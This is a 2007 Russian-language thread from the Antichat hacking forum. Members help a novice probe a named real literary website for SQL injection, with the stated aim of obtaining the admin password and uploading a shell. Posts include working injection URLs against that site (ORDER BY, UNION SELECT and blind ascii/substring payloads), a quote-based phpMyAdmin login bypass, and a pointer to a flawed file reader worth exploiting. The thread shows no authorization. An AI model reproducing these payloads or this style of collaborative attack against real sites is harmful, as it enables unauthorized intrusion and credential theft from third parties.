ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sql inj на сайте
  #1  
Старый 06.03.2007, 17:38
Аватар для NighSh
NighSh
Новичок
Регистрация: 20.11.2006
Сообщений: 19
Провел на форуме:
159979

Репутация: 1
По умолчанию Sql inj на сайте

Всем снова привет =)
Вобщем начал я читать книги, статьи... чуток стал разбираться...
И вернулся все к тому же сайту- www.litsovet.ru
Там вроде есть SQL inj...
я с инекцией пока плохо знаком, но...
1 http://litsovet.ru/index.php/material.read?material_id=
(ставим кавычку получем вот такую фигню-
4¶ .4¶ ..Ў7¶staffЙВ’6¶ .htaccess9зГW¶kvit.htmIrз_W¶tz.zipВ• 6¶author.action.cphpЖmM¶ index.bakNзD\¶t.phpЗ�6¶ css›6¶files1ГИ6¶imagesВ”tВ phpMyAdminА¬7¶gallery.action.cphp7¶ index.phpQз®7¶journal.action.cphpЇ7¶ konkurs.download.cphp+Г°7¶ konkurs.download.php5+Г±7¶litob.action.cph p®Гх6¶ material.action.cphp¬В©Z¶ robots.txtз®6¶$publications.action.cphp±В[¶ regs.php‰vзa.php8Вr4¶$sounds.action.cp hpВ.oldЉUзPИВtempцЎВоT¶ journal.download.phpЂ®В@U¶ knop1.gifaзz”Дaaaaa&ГmyadminSРВ remЌ .info.php^uАэW¶ viewcooc.php9eАW¶index.php.currentЕ®PА tiny_mcez¦Ж]¶asd.htmlYіз9¶ captcha.phpd¶ mailtest.php9eА::¶imap.php№{зжb¶А kvitsb.htmзўf¶¬subscribe_confirm.phpљВ)
Это доказывает наличие уязвимости?!
Так же если в id= поставить "равенство" поста ну типа 964=965-1, то получим страницу 964...
Эм... проблема в том, что я пока не могу понять как искать поля =/
кто нить поможет?

Интересные вещи:
Там стоит Phpmyadmin, если в нем место логина поставить ковычку, то мы попадем в админку... тока с без привелегий(шелл залить не удалось =/ )
А ели обратится к ФТП этого сайта, и тоже вместо логина поставить ковычку, то поле логина просто исчезнет...
Вот...
просто хочу на примере разобраться в sql inj

Заранее спасибо =)
А еще спасибо тем, кто помог хоть чуток встать мне на правильный путь =)
 
Ответить с цитированием

  #2  
Старый 06.03.2007, 17:44
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

если там не ставить кавычку то все-равно такая фигня вылазит, и это не sql-injection...
Просто криво написанный движок...
кстати в этой ошибке видны файлы лежать в директории...
 
Ответить с цитированием

  #3  
Старый 06.03.2007, 17:59
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

ггг накосяченый софт, кароче там типа листинг гг)
 
Ответить с цитированием

  #4  
Старый 06.03.2007, 18:04
Аватар для NighSh
NighSh
Новичок
Регистрация: 20.11.2006
Сообщений: 19
Провел на форуме:
159979

Репутация: 1
По умолчанию

То есть хренушки мне а не иньекция?! (((
эм... блин, ну кому не влом, ну подскажите че делать то...
как добыть пасс админа без Xss =/
Пожалуйста =)))
 
Ответить с цитированием

  #5  
Старый 06.03.2007, 18:26
Аватар для NighSh
NighSh
Новичок
Регистрация: 20.11.2006
Сообщений: 19
Провел на форуме:
159979

Репутация: 1
По умолчанию

а что такое CRLF injection?
 
Ответить с цитированием

  #6  
Старый 06.03.2007, 18:27
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

какая то хрень если честно
http://litsovet.ru/index.php/material.read?material_id=1+order+by+31 - ошибка
http://litsovet.ru/index.php/material.read?material_id=1+order+by+30 - ошибки нет
НО
http://litsovet.ru/index.php/material.read?material_id=30+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30/*
так тоже ошибка =\
 
Ответить с цитированием

  #7  
Старый 06.03.2007, 18:31
Аватар для NighSh
NighSh
Новичок
Регистрация: 20.11.2006
Сообщений: 19
Провел на форуме:
159979

Репутация: 1
По умолчанию

так все таки есть там иньекция =)))?!
 
Ответить с цитированием

  #8  
Старый 06.03.2007, 18:38
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

Цитата:
Сообщение от NighSh  
так все таки есть там иньекция =)))?!
есть.
http://litsovet.ru/index.php/material.read?material_id=123201+and(ascii(substri ng(version(),1,1))>51)
мускул 3 ветки, так что юнион не работает..

+там по идее кривая читалка файлов, ты подума получше, может чтото сможешь намутить с ней
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #9  
Старый 06.03.2007, 18:38
Аватар для NighSh
NighSh
Новичок
Регистрация: 20.11.2006
Сообщений: 19
Провел на форуме:
159979

Репутация: 1
По умолчанию

эм... и еще если не сложно скажите, а какого рака если я в ПХП МОЙ АДМИН в логине ставлю ковычку, то обхажу авторизацию?
 
Ответить с цитированием

  #10  
Старый 06.03.2007, 18:39
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

c411k, хех, точно
Просто совсем забыл про 3 ветку
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ